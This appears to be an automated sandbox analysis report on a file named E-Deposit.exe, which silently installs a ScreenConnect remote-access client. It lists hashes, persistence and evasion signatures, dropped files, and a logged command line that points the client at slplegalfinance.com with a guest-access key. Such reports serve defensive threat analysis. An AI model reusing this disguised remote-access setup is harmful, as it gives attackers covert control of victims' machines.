Analysis

  • max time kernel
    93s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/01/2025, 10:37

General

  • Target

    E-Deposit.exe

  • Size

    5.4MB

  • MD5

    70d47fa2e078f04400d3d1b236245678

  • SHA1

    987aa3368265fc300b10b4128d8367c3d7a29c6c

  • SHA256

    b0a8d541b650ffff1bb4b3690af389e52b1675212129560dbe33038b1041266b

  • SHA512

    a078ec2aa08f1928b7cef2b3b17e02e5a52860dd684ad798ab8aca0a55d1069f45e27497fabf15c4e932299fe206ed4e49085848a1bc3ae087b13ece36f768e2

  • SSDEEP

    49152:AEEL5cx5xTkYJkGYYpT0+TFiH7efP8Q1yJJ4ZD1F5z97oL1YbGQ+okRPGHpRPqM8:pEs6efPNwJ4t1h0cG5FGJRPxow8O

Malware Config

Signatures

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

    Suspicious Windows Authentication Registry Modification.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 3 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Drops file in Program Files directory 19 IoCs
  • Drops file in Windows directory 13 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 22 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 37 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\E-Deposit.exe
    "C:\Users\Admin\AppData\Local\Temp\E-Deposit.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1220
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
      2⤵
      • Enumerates connected drives
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:4352
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Boot or Logon Autostart Execution: Authentication Package
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4664
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 5D32A77BB4D21A21DC564344CD749CEB C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4688
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIC5A2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240633390 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:1776
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
        PID:3932
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding A1CFA5E7717001AA4A960C8B3C0C2261
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:208
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding 8D4E5EEB5D69C37026AD1833B55B295F E Global\MSI0000
        2⤵
        • Drops file in Windows directory
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:1664
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Checks SCSI registry key(s)
      PID:4928
    • C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
      "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=da65b428-b130-470e-aa6b-4653f00a8002&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv"
      1⤵
      • Sets service image path in registry
      • Drops file in System32 directory
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1832
      • C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe
        "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "a3a31205-b073-4006-ba42-70956d54f12a" "User"
        2⤵
        • Executes dropped EXE
        PID:3144
      • C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe
        "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "ed30a53c-4ba8-4eb8-b76f-25f1de9370e6" "System"
        2⤵
        • Drops file in System32 directory
        • Executes dropped EXE
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        PID:3800

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Config.Msi\e57f7ee.rbs

            Filesize

            214KB

            MD5

            27b1cec528cc401844a2a8c014961f5b

            SHA1

            82abcd59b062adac5334d2c42f44112ce8fdabf1

            SHA256

            7d60f1cdfd4275e465a0d51fc030ab8f56bb5e3a473690fd6186cbd4f25a5e97

            SHA512

            55581e213bb478124f6123cb90d75490979517339463a825b548e26bd9510191d93daa52ae2a73284dc306cd63349caa4a31e56aabd176bfc06620f39ef20371

          • C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\Client.Override.en-US.resources

            Filesize

            347B

            MD5

            ec6bad264881a1ae9d05f73712399809

            SHA1

            a7921b44d20ed663d486210c0775c96c45c08f7b

            SHA256

            5748a4bb4cc8e1e9bb3832e1f9e8914038a1b97d2c7523ec342e596317208fb8

            SHA512

            ed77cafa64fe224cb11718ce26906ed807eeb49b2d59e359a7ab0196ce3dbb177663f91e116354e56c6b2441d091a0a07f71413723b7f8dec1cb946fa2045e64

          • C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\Client.Override.resources

            Filesize

            5KB

            MD5

            6f99b6e5484b5785ab7bf8e46882205a

            SHA1

            8304a40796e3aa805f96f9ab6fcac2e5a9676c6e

            SHA256

            e15e9d01d8049ff1e1b01e8e9845df20a4c80a9cf883aa84e0e407a2d865b8e3

            SHA512

            56226014f2c00c062d7505687b2166ca2da905fc921e292eaedd95dc1fb9ad093eb9d1f657f7ba45b32e6040ee09361fb14535f6d0bf4e19fabf6b19942d928d

          • C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\Client.en-US.resources

            Filesize

            48KB

            MD5

            d524e8e6fd04b097f0401b2b668db303

            SHA1

            9486f89ce4968e03f6dcd082aa2e4c05aef46fcc

            SHA256

            07d04e6d5376ffc8d81afe8132e0aa6529cccc5ee789bea53d56c1a2da062be4

            SHA512

            e5bc6b876affeb252b198feb8d213359ed3247e32c1f4bfc2c5419085cf74fe7571a51cad4eaaab8a44f1421f7ca87af97c9b054bdb83f5a28fa9a880d4efde5

          • C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\Client.resources

            Filesize

            26KB

            MD5

            5cd580b22da0c33ec6730b10a6c74932

            SHA1

            0b6bded7936178d80841b289769c6ff0c8eead2d

            SHA256

            de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c

            SHA512

            c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787

          • C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll

            Filesize

            192KB

            MD5

            3724f06f3422f4e42b41e23acb39b152

            SHA1

            1220987627782d3c3397d4abf01ac3777999e01c

            SHA256

            ea0a545f40ff491d02172228c1a39ae68344c4340a6094486a47be746952e64f

            SHA512

            509d9a32179a700ad76471b4cd094b8eb6d5d4ae7ad15b20fd76c482ed6d68f44693fc36bcb3999da9346ae9e43375cd8fe02b61edeabe4e78c4e2e44bf71d42

          • C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll

            Filesize

            66KB

            MD5

            5db908c12d6e768081bced0e165e36f8

            SHA1

            f2d3160f15cfd0989091249a61132a369e44dea4

            SHA256

            fd5818dcdf5fc76316b8f7f96630ec66bb1cb5b5a8127cf300e5842f2c74ffca

            SHA512

            8400486cadb7c07c08338d8876bc14083b6f7de8a8237f4fe866f4659139acc0b587eb89289d281106e5baf70187b3b5e86502a2e340113258f03994d959328d

          • C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe

            Filesize

            93KB

            MD5

            75b21d04c69128a7230a0998086b61aa

            SHA1

            244bd68a722cfe41d1f515f5e40c3742be2b3d1d

            SHA256

            f1b5c000794f046259121c63ed37f9eff0cfe1258588eca6fd85e16d3922767e

            SHA512

            8d51b2cd5f21c211eb8fea4b69dc9f91dffa7bb004d9780c701de35eac616e02ca30ef3882d73412f7eab1211c5aa908338f3fa10fdf05b110f62b8ecd9d24c2

          • C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsAuthenticationPackage.dll

            Filesize

            254KB

            MD5

            5adcb5ae1a1690be69fd22bdf3c2db60

            SHA1

            09a802b06a4387b0f13bf2cda84f53ca5bdc3785

            SHA256

            a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5

            SHA512

            812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73

          • C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe

            Filesize

            588KB

            MD5

            1778204a8c3bc2b8e5e4194edbaf7135

            SHA1

            0203b65e92d2d1200dd695fe4c334955befbddd3

            SHA256

            600cf10e27311e60d32722654ef184c031a77b5ae1f8abae8891732710afee31

            SHA512

            a902080ff8ee0d9aeffa0b86e7980457a4e3705789529c82679766580df0dc17535d858fbe50731e00549932f6d49011868dee4181c6716c36379ad194b0ed69

          • C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe.config

            Filesize

            266B

            MD5

            728175e20ffbceb46760bb5e1112f38b

            SHA1

            2421add1f3c9c5ed9c80b339881d08ab10b340e3

            SHA256

            87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077

            SHA512

            fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

          • C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dll

            Filesize

            822KB

            MD5

            be74ab7a848a2450a06de33d3026f59e

            SHA1

            21568dcb44df019f9faf049d6676a829323c601e

            SHA256

            7a80e8f654b9ddb15dda59ac404d83dbaf4f6eafafa7ecbefc55506279de553d

            SHA512

            2643d649a642220ceee121038fe24ea0b86305ed8232a7e5440dffc78270e2bda578a619a76c5bb5a5a6fe3d9093e29817c5df6c5dd7a8fbc2832f87aa21f0cc

          • C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\app.config

            Filesize

            951B

            MD5

            a86edeabe4f506104c9b4a70ec058203

            SHA1

            90f2c46b4c7ea592ee2027cbe85239878b21cd65

            SHA256

            1559ff67fb04a2deb98a1733d1e1b61dd48d406cf70a0a1d2f386ee65acd805e

            SHA512

            b5261e93d9dd436b885661e57aa2f75654b50675ddf8dea06aef0db0e02ad9194a80dffab93a7fdc10b20eb1a1af36e80e8c4069f7004bd5c69db675ca17dca2

          • C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\system.config

            Filesize

            956B

            MD5

            5beecffffc74f49700d1eac5a1ac5545

            SHA1

            f7ffbdc8e37a62b480ddd3d04a52f8a3418d5f20

            SHA256

            257fa1ff9f14e80025acbea5ceb1ee308c32a948289361f8dcda666c82b8fb82

            SHA512

            b0e447c5062116e2b1f6ab5e619d095b63e85076f83e912bf038ceb6dc7984f0e5ff0ff26ffabe5abd5cceae498b1562eb63784a8c019551faad3b828fefbc85

          • C:\Users\Admin\AppData\Local\Temp\MSIC5A2.tmp

            Filesize

            1.0MB

            MD5

            8a8767f589ea2f2c7496b63d8ccc2552

            SHA1

            cc5de8dd18e7117d8f2520a51edb1d165cae64b0

            SHA256

            0918d8ab2237368a5cec8ce99261fb07a1a1beeda20464c0f91af0fe3349636b

            SHA512

            518231213ca955acdf37b4501fde9c5b15806d4fc166950eb8706e8d3943947cf85324faee806d7df828485597eceffcfa05ca1a5d8ab1bd51ed12df963a1fe4

          • C:\Users\Admin\AppData\Local\Temp\MSIC5A2.tmp-\Microsoft.Deployment.WindowsInstaller.dll

            Filesize

            172KB

            MD5

            5ef88919012e4a3d8a1e2955dc8c8d81

            SHA1

            c0cfb830b8f1d990e3836e0bcc786e7972c9ed62

            SHA256

            3e54286e348ebd3d70eaed8174cca500455c3e098cdd1fccb167bc43d93db29d

            SHA512

            4544565b7d69761f9b4532cc85e7c654e591b2264eb8da28e60a058151030b53a99d1b2833f11bfc8acc837eecc44a7d0dbd8bc7af97fc0e0f4938c43f9c2684

          • C:\Users\Admin\AppData\Local\Temp\MSIC5A2.tmp-\ScreenConnect.Core.dll

            Filesize

            536KB

            MD5

            14e7489ffebbb5a2ea500f796d881ad9

            SHA1

            0323ee0e1faa4aa0e33fb6c6147290aa71637ebd

            SHA256

            a2e9752de49d18e885cbd61b29905983d44b4bc0379a244bfabdaa3188c01f0a

            SHA512

            2110113240b7d803d8271139e0a2439dbc86ae8719ecd8b132bbda2520f22dc3f169598c8e966ac9c0a40e617219cb8fe8aac674904f6a1ae92d4ac1e20627cd

          • C:\Users\Admin\AppData\Local\Temp\MSIC5A2.tmp-\ScreenConnect.InstallerActions.dll

            Filesize

            11KB

            MD5

            73a24164d8408254b77f3a2c57a22ab4

            SHA1

            ea0215721f66a93d67019d11c4e588a547cc2ad6

            SHA256

            d727a640723d192aa3ece213a173381682041cb28d8bd71781524dbae3ddbf62

            SHA512

            650d4320d9246aaecd596ac8b540bf7612ec7a8f60ecaa6e9c27b547b751386222ab926d0c915698d0bb20556475da507895981c072852804f0b42fdda02b844

          • C:\Users\Admin\AppData\Local\Temp\MSIC5A2.tmp-\ScreenConnect.Windows.dll

            Filesize

            1.6MB

            MD5

            9ad3964ba3ad24c42c567e47f88c82b2

            SHA1

            6b4b581fc4e3ecb91b24ec601daa0594106bcc5d

            SHA256

            84a09ed81afc5ff9a17f81763c044c82a2d9e26f852de528112153ee9ab041d0

            SHA512

            ce557a89c0fe6de59046116c1e262a36bbc3d561a91e44dcda022bef72cb75742c8b01bedcc5b9b999e07d8de1f94c665dd85d277e981b27b6bfebeaf9e58097

          • C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi

            Filesize

            12.8MB

            MD5

            dba166c47f82656c2399f7223de2db3f

            SHA1

            9cf89a17aef41e2c3bde3761e1769b2831609fdf

            SHA256

            20e07d53e0f53958d613cb374f001ebdbff95ed2d96f2f46bca286d408662b44

            SHA512

            b19e49ce816783f04aadf28ab02e0692383c5a5a706ab9c6e7a7329023f5596915fc26b88b1c72c4d68e934f0da61df99dcfe0cce166f62544e6d5245939215c

          • C:\Windows\Installer\MSIF907.tmp

            Filesize

            202KB

            MD5

            ba84dd4e0c1408828ccc1de09f585eda

            SHA1

            e8e10065d479f8f591b9885ea8487bc673301298

            SHA256

            3cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852

            SHA512

            7a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290

          • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

            Filesize

            24.1MB

            MD5

            86f5b2dea54b210aa01d09cc67ba63c7

            SHA1

            7550a34b77a752edc3db88945a1ed2ef56a6d678

            SHA256

            2c58df42b17c8397c0a670267497cabc07f338450f0c7af6391e735499c65e28

            SHA512

            d7f34a1f4e939594a5ef14ad8745a785fc5ab693f4f2768cf0ab7997bbb0d40fdcc87b3e6fd712529005bd589f9c42e7349d624c39f07c8cbc9941ff518cdeb5

          • \??\Volume{ff55ba41-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{28e221ce-2299-4168-b24f-c212f17a733e}_OnDiskSnapshotProp

            Filesize

            6KB

            MD5

            d6885675473fe53047e8a70b37920931

            SHA1

            60116ede4ddb5d0d347d3be5b616d48bb905cb54

            SHA256

            f494d23f5feee8292b1fb7e4868f3970c22e4211ebd73a3d8177227471d4d840

            SHA512

            ff2d0a2458badcfdb4274710aa605a69b0f5fe2bcb7176c243cf08a9cdb3739d658ce517778d9aaee38273fa579bd2ed675574f0ad6bcf48f8deda0e0e6ceb67

          • memory/1220-2-0x0000000005720000-0x0000000005A10000-memory.dmp

            Filesize

            2.9MB

          • memory/1220-10-0x00000000745C0000-0x0000000074D70000-memory.dmp

            Filesize

            7.7MB

          • memory/1220-5-0x0000000005530000-0x0000000005552000-memory.dmp

            Filesize

            136KB

          • memory/1220-0-0x00000000745CE000-0x00000000745CF000-memory.dmp

            Filesize

            4KB

          • memory/1220-1-0x0000000001840000-0x0000000001848000-memory.dmp

            Filesize

            32KB

          • memory/1220-7-0x0000000005FC0000-0x0000000006564000-memory.dmp

            Filesize

            5.6MB

          • memory/1220-13-0x00000000745C0000-0x0000000074D70000-memory.dmp

            Filesize

            7.7MB

          • memory/1220-6-0x0000000005550000-0x00000000056FA000-memory.dmp

            Filesize

            1.7MB

          • memory/1220-8-0x00000000745C0000-0x0000000074D70000-memory.dmp

            Filesize

            7.7MB

          • memory/1220-9-0x00000000745C0000-0x0000000074D70000-memory.dmp

            Filesize

            7.7MB

          • memory/1220-3-0x00000000745C0000-0x0000000074D70000-memory.dmp

            Filesize

            7.7MB

          • memory/1220-4-0x00000000054A0000-0x000000000552C000-memory.dmp

            Filesize

            560KB

          • memory/1776-37-0x0000000005640000-0x000000000564A000-memory.dmp

            Filesize

            40KB

          • memory/1776-41-0x0000000005710000-0x000000000579C000-memory.dmp

            Filesize

            560KB

          • memory/1776-45-0x0000000005950000-0x0000000005AFA000-memory.dmp

            Filesize

            1.7MB

          • memory/1776-33-0x0000000005600000-0x000000000562E000-memory.dmp

            Filesize

            184KB

          • memory/1832-138-0x0000000004300000-0x00000000043D2000-memory.dmp

            Filesize

            840KB

          • memory/1832-136-0x0000000004080000-0x00000000040C1000-memory.dmp

            Filesize

            260KB

          • memory/1832-134-0x0000000004120000-0x00000000041B2000-memory.dmp

            Filesize

            584KB

          • memory/1832-133-0x0000000003E60000-0x0000000003E96000-memory.dmp

            Filesize

            216KB

          • memory/1832-129-0x0000000003E10000-0x0000000003E60000-memory.dmp

            Filesize

            320KB

          • memory/1832-102-0x00000000015C0000-0x00000000015D8000-memory.dmp

            Filesize

            96KB

          • memory/3144-148-0x0000000003070000-0x00000000030A6000-memory.dmp

            Filesize

            216KB

          • memory/3144-150-0x000000001BF60000-0x000000001C10A000-memory.dmp

            Filesize

            1.7MB

          • memory/3144-149-0x000000001BD20000-0x000000001BDAC000-memory.dmp

            Filesize

            560KB

          • memory/3144-147-0x0000000000DC0000-0x0000000000E56000-memory.dmp

            Filesize

            600KB

          • memory/3144-153-0x000000001C2A0000-0x000000001C426000-memory.dmp

            Filesize

            1.5MB

          • memory/3144-154-0x0000000001650000-0x0000000001668000-memory.dmp

            Filesize

            96KB

          • memory/3144-155-0x0000000003050000-0x0000000003068000-memory.dmp

            Filesize

            96KB